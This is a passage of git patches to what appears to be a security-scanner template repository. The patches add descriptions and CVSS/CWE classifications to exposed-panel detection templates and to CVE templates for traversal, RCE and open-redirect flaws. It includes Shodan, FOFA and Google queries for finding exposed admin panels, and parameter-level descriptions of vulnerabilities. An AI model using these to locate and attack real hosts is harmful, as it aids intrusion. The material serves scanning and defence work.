Tue, 25 Apr 2023 12:08:56 -0400 Subject: [PATCH 049/609] Enhancement: exposed-panels/hashicorp-consul-agent.yaml by md --- exposed-panels/hashicorp-consul-agent.yaml | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/exposed-panels/hashicorp-consul-agent.yaml b/exposed-panels/hashicorp-consul-agent.yaml index 9864f3c349..3fec4ad821 100644 --- a/exposed-panels/hashicorp-consul-agent.yaml +++ b/exposed-panels/hashicorp-consul-agent.yaml @@ -1,10 +1,14 @@ id: hashicorp-consul-agent info: - name: Hashicorp Consul Agent Detection + name: Hashicorp Consul Panel - Detect author: c-sh0 severity: info - description: Obtain Consul Version Information + description: Hashicorp Consul panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: tech,consul,api requests: @@ -23,4 +27,6 @@ requests: extractors: - type: json json: - - " .Config.Version" \ No newline at end of file + - " .Config.Version" + +# Enhanced by md on 2023/04/25 From 69f9ecf3a863b430d7f0f8faf77b61e6e7e0b944 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 12:11:32 -0400 Subject: [PATCH 050/609] Enhancement: exposed-panels/hestia-panel.yaml by md --- exposed-panels/hestia-panel.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/hestia-panel.yaml b/exposed-panels/hestia-panel.yaml index f009d25152..28fc91188c 100644 --- a/exposed-panels/hestia-panel.yaml +++ b/exposed-panels/hestia-panel.yaml @@ -1,11 +1,16 @@ id: hestia-panel info: - name: Hestia Control Panel - Detect + name: Hestia Control Panel Login - Detect author: JustaAcat severity: info + description: Hestia Control Panel login was detected. reference: - https://hestiacp.com/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: title:"Hestia Control Panel" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 27ba52103e8c05c44a700f9230ca99c579d5fd2c Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 12:20:25 -0400 Subject: [PATCH 051/609] Enhancement: exposed-panels/i-mscp-panel.yaml by md --- exposed-panels/i-mscp-panel.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/i-mscp-panel.yaml b/exposed-panels/i-mscp-panel.yaml index 6123e72c81..dc6ca61720 100644 --- a/exposed-panels/i-mscp-panel.yaml +++ b/exposed-panels/i-mscp-panel.yaml @@ -1,11 +1,16 @@ id: i-mscp-panel info: - name: i-MSCP - Multi Server Control Panel - Detect + name: Internet Multi Server Control Panel - Detect author: JustaAcat severity: info + description: Internet Multi Server Control Panel was detected. reference: - https://i-mscp.net/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: title:"i-MSCP - Multi Server Control Panel" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From a546c24a4530dd250ca14ece6be8ce9fb6b88e61 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:01:46 -0400 Subject: [PATCH 052/609] Enhancement: exposed-panels/jboss/jboss-jbpm-admin.yaml by md --- exposed-panels/jboss/jboss-jbpm-admin.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/jboss/jboss-jbpm-admin.yaml b/exposed-panels/jboss/jboss-jbpm-admin.yaml index f0604a56d4..c758d3a235 100644 --- a/exposed-panels/jboss/jboss-jbpm-admin.yaml +++ b/exposed-panels/jboss/jboss-jbpm-admin.yaml @@ -1,11 +1,16 @@ id: jboss-jbpm-admin info: - name: JBoss jBPM Admin Console - Detect + name: JBoss jBPM Administration Console Login Panel - Detect author: DhiyaneshDK severity: info + description: JBoss jBPM Administration Console login panel was detected. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: html:"JBossWS" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 09dbc27a8657d332430b47c49e191202d6fd90ef Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:12:00 -0400 Subject: [PATCH 053/609] Enhancement: exposed-panels/jboss/jboss-soa-platform.yaml by md --- exposed-panels/jboss/jboss-soa-platform.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/jboss/jboss-soa-platform.yaml b/exposed-panels/jboss/jboss-soa-platform.yaml index 9adee39132..7a486c4f75 100644 --- a/exposed-panels/jboss/jboss-soa-platform.yaml +++ b/exposed-panels/jboss/jboss-soa-platform.yaml @@ -1,9 +1,14 @@ id: jboss-soa-platform info: - name: JBoss SOA Platform Panel - Detect + name: JBoss SOA Platform Login Panel - Detect author: ritikchaddha severity: info + description: JBoss SOA Platform login panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Welcome to the JBoss SOA Platform" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From e78dd5c2f7276f0e0c3409cf9ed57876413a89ea Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:20:31 -0400 Subject: [PATCH 054/609] Enhancement: exposed-panels/konga-panel.yaml by md --- exposed-panels/konga-panel.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/konga-panel.yaml b/exposed-panels/konga-panel.yaml index 7892aab6bf..0c1c13386f 100644 --- a/exposed-panels/konga-panel.yaml +++ b/exposed-panels/konga-panel.yaml @@ -1,11 +1,16 @@ id: konga-panel info: - name: Konga Panel Detect + name: Konga Panel - Detect author: princechaddha severity: info + description: Konga panel was detected. reference: - https://github.com/pantsel/konga + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: tech,konga,oss requests: @@ -30,3 +35,5 @@ requests: group: 1 regex: - 'konga_version = "(.*)";' + +# Enhanced by md on 2023/04/25 From e81783b2303ce36676a79befbbfb6cad86891660 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:23:56 -0400 Subject: [PATCH 055/609] Enhancement: exposed-panels/kraken-cluster-monitoring.yaml by md --- exposed-panels/kraken-cluster-monitoring.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/kraken-cluster-monitoring.yaml b/exposed-panels/kraken-cluster-monitoring.yaml index 9508a0b507..aa9cc29378 100644 --- a/exposed-panels/kraken-cluster-monitoring.yaml +++ b/exposed-panels/kraken-cluster-monitoring.yaml @@ -1,9 +1,14 @@ id: kraken-cluster-monitoring info: - name: Kraken Cluster Monitoring - Detect + name: Kraken Cluster Monitoring Panel- Detect author: pussycat0x severity: info + description: Kraken Cluster Monitoring panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Kraken dashboard" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From c8aedf699d3235b46088dfaa0053f2b061d39b48 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:31:05 -0400 Subject: [PATCH 056/609] Enhancement: exposed-panels/kubernetes-enterprise-manager.yaml by md --- exposed-panels/kubernetes-enterprise-manager.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/exposed-panels/kubernetes-enterprise-manager.yaml b/exposed-panels/kubernetes-enterprise-manager.yaml index cd3e9639af..24b808a1f9 100644 --- a/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/exposed-panels/kubernetes-enterprise-manager.yaml @@ -1,9 +1,14 @@ id: kubernetes-enterprise-manager info: - name: Detect Kubernetes Enterprise Manager + name: Kubernetes Enterprise Manager Panel - Detect author: pussycat0x severity: info + description: Kubernetes Enterprise Manager panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-query: app="Kubernetes-Enterprise-Manager" tags: tech,kubernetes @@ -22,4 +27,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2023/04/25 From 52fdf9fa2a87bba739bd44fac043d4f38801dd62 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:33:00 -0400 Subject: [PATCH 057/609] Enhancement: exposed-panels/kubernetes-mirantis.yaml by md --- exposed-panels/kubernetes-mirantis.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/kubernetes-mirantis.yaml b/exposed-panels/kubernetes-mirantis.yaml index 61203af3bf..3df7d61cf1 100644 --- a/exposed-panels/kubernetes-mirantis.yaml +++ b/exposed-panels/kubernetes-mirantis.yaml @@ -1,9 +1,14 @@ id: kubernetes-mirantis info: - name: Mirantis Kubernetes Engine + name: Mirantis Kubernetes Engine Panel - Detect author: pussycat0x severity: info + description: Mirantis Kubernetes Engine panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Mirantis Kubernetes Engine" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 1939d5e70607116729f06efd5dc530e267ce98ed Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:39:33 -0400 Subject: [PATCH 058/609] Enhancement: exposed-panels/magnolia-panel.yaml by md --- exposed-panels/magnolia-panel.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/exposed-panels/magnolia-panel.yaml b/exposed-panels/magnolia-panel.yaml index cd75fc72c1..815dc554db 100644 --- a/exposed-panels/magnolia-panel.yaml +++ b/exposed-panels/magnolia-panel.yaml @@ -1,13 +1,17 @@ id: magnolia-panel info: - name: Magnolia Panel - Detect + name: Magnolia CMS Login Panel - Detect author: pussycat0x severity: info description: | - Magnolia CMS is a powerful and versatile content management system that provides users with a host of features and options for web development. It offers a wide range of capabilities to help create a website that is both attractive and effective. + Magnolia CMS login panel was detected. reference: - https://www.magnolia-cms.com/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: html:"Magnolia is a registered trademark" @@ -31,3 +35,5 @@ requests: part: header words: - "text/html" + +# Enhanced by md on 2023/04/25 From 2dabd5c98b5b7f907c282953b10549950ada8efa Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:44:04 -0400 Subject: [PATCH 059/609] Enhancement: exposed-panels/mautic-crm-panel.yaml by md --- exposed-panels/mautic-crm-panel.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/exposed-panels/mautic-crm-panel.yaml b/exposed-panels/mautic-crm-panel.yaml index 2671f8dff5..fced464df7 100644 --- a/exposed-panels/mautic-crm-panel.yaml +++ b/exposed-panels/mautic-crm-panel.yaml @@ -1,13 +1,16 @@ id: mautic-crm-panel info: - name: Mautic CRM Panel Login + name: Mautic CRM Login Panel - Detect author: cyllective,daffainfo severity: info - description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms, - questionnaires, reports, etc. + description: Mautic CRM login panel was detected. reference: - https://github.com/mautic/mautic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: tech,mautic,crm requests: @@ -27,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 2a0b5b8d4546d2576937794c6f84d3e838505513 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 13:59:43 -0400 Subject: [PATCH 060/609] Enhancement: exposed-panels/metasploit-setup-page.yaml by md --- exposed-panels/metasploit-setup-page.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposed-panels/metasploit-setup-page.yaml b/exposed-panels/metasploit-setup-page.yaml index 1f159f667c..23274707e9 100644 --- a/exposed-panels/metasploit-setup-page.yaml +++ b/exposed-panels/metasploit-setup-page.yaml @@ -4,6 +4,11 @@ info: name: Metasploit Setup and Configuration Page - Detect author: ritikchaddha severity: info + description: Metasploit setup and configuration page was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: title:"Metasploit - Setup and Configuration" @@ -20,3 +25,5 @@ requests: part: body words: - 'Metasploit - Setup and Configuration' + +# Enhanced by md on 2023/04/25 From 7f4a79502cea12cb6fbefb8a2f3a3d4012bcf031 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 14:13:36 -0400 Subject: [PATCH 061/609] Enhancement: exposed-panels/normhost-backup-server-manager.yaml by md --- exposed-panels/normhost-backup-server-manager.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/normhost-backup-server-manager.yaml b/exposed-panels/normhost-backup-server-manager.yaml index ecae6f1065..f11b3207c8 100644 --- a/exposed-panels/normhost-backup-server-manager.yaml +++ b/exposed-panels/normhost-backup-server-manager.yaml @@ -1,9 +1,14 @@ id: normhost-backup-server-manager info: - name: Normhost Backup Server Manager - Detect + name: Normhost Backup Server Manager Panel - Detect author: pussycat0x severity: info + description: Normhost Backup server manager panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Normhost Backup server manager" @@ -24,3 +29,5 @@ requests: - type: status status: - 401 + +# Enhanced by md on 2023/04/25 From 5d0ee6e9828d9b3a91f42d8b859f7cffd74dc3b0 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 14:21:30 -0400 Subject: [PATCH 062/609] Enhancement: exposed-panels/o2-easy-panel.yaml by md --- exposed-panels/o2-easy-panel.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposed-panels/o2-easy-panel.yaml b/exposed-panels/o2-easy-panel.yaml index 77b3e71507..b1db72eaeb 100644 --- a/exposed-panels/o2-easy-panel.yaml +++ b/exposed-panels/o2-easy-panel.yaml @@ -1,9 +1,14 @@ id: o2-easy-panel info: - name: O2 Easy Setup Router Panel - Detect + name: O2 Router Setup Panel - Detect author: ritikchaddha severity: info + description: O2 router setup panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" shodan-query: title:"O2 Easy Setup" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/25 From 33b65e10c713cdc63b2c4417ba8536c9646a17ab Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 25 Apr 2023 14:25:03 -0400 Subject: [PATCH 063/609] Enhancement: exposed-panels/opencpu-panel.yaml by md --- exposed-panels/opencpu-panel.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/exposed-panels/opencpu-panel.yaml b/exposed-panels/opencpu-panel.yaml index ed268eb4ce..496e76d40f 100644 --- a/exposed-panels/opencpu-panel.yaml +++ b/exposed-panels/opencpu-panel.yaml @@ -1,11 +1,16 @@ id: opencpu-panel info: - name: OpenCPU Panel + name: OpenCPU Panel - Detect author: wa1tf0rme severity: info + description: OpenCPU panel was detected. reference: - https://github.com/opencpu/opencpu/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: opencpu,oss requests: @@ -20,4 +25,6 @@ requests: words: - OpenCPU Test Page - OpenCPU API Explorer - condition: or \ No newline at end of file + condition: or + +# Enhanced by md on 2023/04/25 From 839f70bd0b8e1b3bcec104d4942cf33d8cc2a732 Mon Sep 17 00:00:00 2001 From: sullo Date: Wed, 26 Apr 2023 13:15:07 -0400 Subject: [PATCH 064/609] Cleanups, severity mismatches --- cves/2002/CVE-2002-1131.yaml | 6 +++--- cves/2010/CVE-2010-5286.yaml | 6 +++--- cves/2012/CVE-2012-0991.yaml | 6 +++--- cves/2012/CVE-2012-1823.yaml | 6 +++--- cves/2013/CVE-2013-2248.yaml | 8 ++++---- cves/2014/CVE-2014-2383.yaml | 6 +++--- cves/2014/CVE-2014-3120.yaml | 6 +++--- cves/2014/CVE-2014-4940.yaml | 10 +++++----- cves/2014/CVE-2014-5111.yaml | 10 +++++----- cves/2015/CVE-2015-0554.yaml | 6 +++--- cves/2015/CVE-2015-1427.yaml | 6 +++--- cves/2017/CVE-2017-16894.yaml | 2 +- cves/2022/CVE-2022-0776.yaml | 8 ++++---- exposed-panels/axway-securetransport-webclient.yaml | 2 +- exposed-panels/jboss/jboss-jbpm-admin.yaml | 2 +- 15 files changed, 45 insertions(+), 45 deletions(-) diff --git a/cves/2002/CVE-2002-1131.yaml b/cves/2002/CVE-2002-1131.yaml index c3485581ab..0b345d731c 100644 --- a/cves/2002/CVE-2002-1131.yaml +++ b/cves/2002/CVE-2002-1131.yaml @@ -14,10 +14,10 @@ info: - http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/ - https://nvd.nist.gov/vuln/detail/CVE-2002-1131 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 cve-id: CVE-2002-1131 - cwe-id: NVD-CWE-Other - cvss-score: 7.5 tags: cve2002,edb,xss,squirrelmail,cve requests: diff --git a/cves/2010/CVE-2010-5286.yaml b/cves/2010/CVE-2010-5286.yaml index d6b50039ef..1c81340c8e 100644 --- a/cves/2010/CVE-2010-5286.yaml +++ b/cves/2010/CVE-2010-5286.yaml @@ -12,10 +12,10 @@ info: - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt remediation: Upgrade to a supported version. classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C - cve-id: CVE-2010-5286 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cwe-id: CWE-22 - cvss-score: 10.0 + cve-id: CVE-2010-5286 tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml index d5af2c49f7..812c321a19 100644 --- a/cves/2012/CVE-2012-0991.yaml +++ b/cves/2012/CVE-2012-0991.yaml @@ -11,10 +11,10 @@ info: - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/ - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N - cvss-score: 3.5 - cve-id: CVE-2012-0991 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cwe-id: CWE-22 + cve-id: CVE-2012-0991 tags: lfi,openemr,traversal,edb,cve,cve2012 requests: diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml index 9730767996..903e4389fc 100644 --- a/cves/2012/CVE-2012-1823.yaml +++ b/cves/2012/CVE-2012-1823.yaml @@ -12,10 +12,10 @@ info: - https://bugs.php.net/bug.php?id=61910 - http://www.php.net/ChangeLog-5.php#5.4.2 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P - cvss-score: 7.5 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 cve-id: CVE-2012-1823 - cwe-id: CWE-20 tags: cve2012,kev,vulhub,rce,php,cve requests: diff --git a/cves/2013/CVE-2013-2248.yaml b/cves/2013/CVE-2013-2248.yaml index 46a5c7a1a5..20ec5e7246 100644 --- a/cves/2013/CVE-2013-2248.yaml +++ b/cves/2013/CVE-2013-2248.yaml @@ -3,7 +3,7 @@ id: CVE-2013-2248 info: name: Apache Struts - Multiple Open Redirection Vulnerabilities author: 0x_Akoko - severity: low + severity: medium description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. reference: - https://www.exploit-db.com/exploits/38666 @@ -12,10 +12,10 @@ info: - http://struts.apache.org/release/2.3.x/docs/s2-017.html remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N - cvss-score: 5.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-601 cve-id: CVE-2013-2248 - cwe-id: CWE-20 tags: cve,cve2013,apache,redirect,struts,edb requests: diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml index 0156956af7..40fac2a195 100644 --- a/cves/2014/CVE-2014-2383.yaml +++ b/cves/2014/CVE-2014-2383.yaml @@ -13,10 +13,10 @@ info: - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582 - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N - cvss-score: 4.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 cve-id: CVE-2014-2383 - cwe-id: CWE-200 metadata: verified: "true" tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml index 61fa6792ff..6dc1b9e217 100644 --- a/cves/2014/CVE-2014-3120.yaml +++ b/cves/2014/CVE-2014-3120.yaml @@ -12,10 +12,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://bouk.co/blog/elasticsearch-rce/ classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P - cvss-score: 6.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 cve-id: CVE-2014-3120 - cwe-id: CWE-284 tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic requests: diff --git a/cves/2014/CVE-2014-4940.yaml b/cves/2014/CVE-2014-4940.yaml index 112f4be5d7..076a642394 100644 --- a/cves/2014/CVE-2014-4940.yaml +++ b/cves/2014/CVE-2014-4940.yaml @@ -1,19 +1,19 @@ id: CVE-2014-4940 info: - name: WordPress Plugin Tera Charts - Directory Traversal + name: WordPress Plugin Tera Charts - Local File Inclusion author: daffainfo severity: high - description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N - cve-id: CVE-2014-4940 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cwe-id: CWE-22 - cvss-score: 5.0 + cve-id: CVE-2014-4940 metadata: google-query: inurl:"/wp-content/plugins/tera-charts" tags: cve,cve2014,wordpress,wp-plugin,lfi diff --git a/cves/2014/CVE-2014-5111.yaml b/cves/2014/CVE-2014-5111.yaml index 2fe090b8f7..f32e019e07 100644 --- a/cves/2014/CVE-2014-5111.yaml +++ b/cves/2014/CVE-2014-5111.yaml @@ -1,19 +1,19 @@ id: CVE-2014-5111 info: - name: Fonality trixbox - Directory Traversal + name: Fonality trixbox - Local File Inclusion author: daffainfo severity: high - description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. reference: - https://www.exploit-db.com/exploits/39351 - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N - cve-id: CVE-2014-5111 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cwe-id: CWE-22 - cvss-score: 5.0 + cve-id: CVE-2014-5111 tags: packetstorm,cve,cve2014,lfi,trixbox,edb requests: diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml index 2ab7448078..ae3272ee01 100644 --- a/cves/2015/CVE-2015-0554.yaml +++ b/cves/2015/CVE-2015-0554.yaml @@ -11,10 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 - http://www.exploit-db.com/exploits/35721 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 cve-id: CVE-2015-0554 - cwe-id: CWE-264 - cvss-score: 9.4 tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015 requests: diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml index 21ca4d39aa..c761d325cb 100644 --- a/cves/2015/CVE-2015-1427.yaml +++ b/cves/2015/CVE-2015-1427.yaml @@ -11,10 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-1427 - http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P - cvss-score: 7.5 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 cve-id: CVE-2015-1427 - cwe-id: CWE-284 tags: cve,cve2015,elastic,rce,elasticsearch,kev requests: diff --git a/cves/2017/CVE-2017-16894.yaml 